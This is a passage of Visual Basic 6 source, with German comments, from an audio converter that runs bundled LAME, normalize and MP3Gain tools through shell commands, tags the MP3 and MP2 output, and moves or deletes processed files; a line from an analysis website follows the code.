Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
Call Werkzeuge.IsFileOpen(frmMain.work.Text + "temp.ogg")
Name frmMain.work.Text + "temp.ogg" As frmMain.work.Text + filename + ".ogg"
End If
If extension = "mp3" Then
If Aktivierauswahl.mp3normal_aktiv.Value = "1" Then 'wenn normalisierung (normalize) aktiviert
frmMain.normset.Caption = " Normalize" 'Infofenster
If normal.prozenable.Value = "1" Then
frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
Else
frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
End If
' hier startet lame (mp2 in temp.wav)
cmd = """" + App.Path + "\tools\lame.exe""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
' hier startet normalisierung
cmd = """" + App.Path + "\tools\" + "normalize.exe """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
temppfad = """" + frmMain.work.Text + "temp.wav"" """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung aktiviert
Else
temppfad = """" + file + """ """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung (normalize) deaktiviert
End If
'Hier wird Lame gestartet
If Aktivierauswahl.mp3_cbr_aktiv.Value = "1" Then 'CBR verwenden
frmMain.encoderset.Caption = "CBR " + MP3cbrmenu.cbrbitrate.Text 'Infofenster
cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3cbrparameter 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
If Aktivierauswahl.mp3_vbr_aktiv.Value = "1" Then 'VBR verwenden
frmMain.encoderset.Caption = "VBR " + MP3vbrmenu.minbit.Text + "/" + MP3vbrmenu.maxbit.Text 'Infofenster
cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3vbrparameter 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
If Aktivierauswahl.mp3_abr_aktiv.Value = "1" Then 'ABR verwenden
frmMain.encoderset.Caption = "ABR " + MP3abrmenu.abrbitrate.Text 'Infofenster
cmd = """" + App.Path + "\tools\lame.exe"" " + temppfad + MP3abrparameter 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
'MP3-Gain (mp3 normalisierung)
If Aktivierauswahl.mp3gain_aktiv.Value = "1" Then
frmMain.normset.Caption = " MP3-Gain" 'Infofenster
If mp3gain.auto.Value = "1" Then
frmMain.normset.Caption = frmMain.normset.Caption + " ,auto" 'Infofenster
Else
frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(mp3gain.Slider1.CurPosition) + "db" 'Infofenster
End If
cmd = """" + App.Path + "\tools\mp3gain.exe""" + mp3gainstring + """" + frmMain.work.Text + filename + "." + extension + """" 'Dos-Befehl bilden
Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
End If
End If
frmMain.mp3size.Caption = Format(FileLen(frmMain.work.Text + filename + "." + extension) / 1024, "0.0") + "kb"
quellfile = frmMain.work.Text + filename + "." + extension 'Tempquellfile wird bestimmt
If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist) 'wenn alte "normale" playlist dann l?schen
konvertieren = quellfile
If extension = "mp2" Or extension = "mp3" Then
Set genie = frmMain.AudioGenie
genie.ID3v2EncodeSettings = frmMain.encoderset.Caption + frmMain.normset.Caption 'Encodersettings
genie.SaveID3v2ToFile (konvertieren)
Set genie = Nothing
End If
If FileLen(konvertieren) < tagging.delsize(0).CurPosition Then
If LenB(Dir$(konvertieren, vbDirectory)) <> 0 Then Kill konvertieren
Call Ausgabe.textbox(filename + ".mp2......Filesize problem / deleted")
konvertieren = "error"
End If
Set DShell = Nothing
Exit Function
fehler:
Call Ausgabe.textbox("Unknown problem / trying next file")
konvertieren = "error"
End Function
Private Sub untagged(quellfile As String, verzeichnis As String, akttime As Date, aktdate As Date, file As String, anzahl As Integer, upperlimit As Integer)
Call file_speichern.untaggedspeichern(quellfile, verzeichnis, akttime, aktdate) 'File verschieben
If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
End Sub
Private Sub tagged(quellfile As String, temppfad As String, file As String, akttime As Date, aktdate As Date, anzahl As Integer, upperlimit As Integer)
Call file_speichern.taggedspeichern(quellfile, temppfad, akttime, aktdate) 'File verschieben
frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.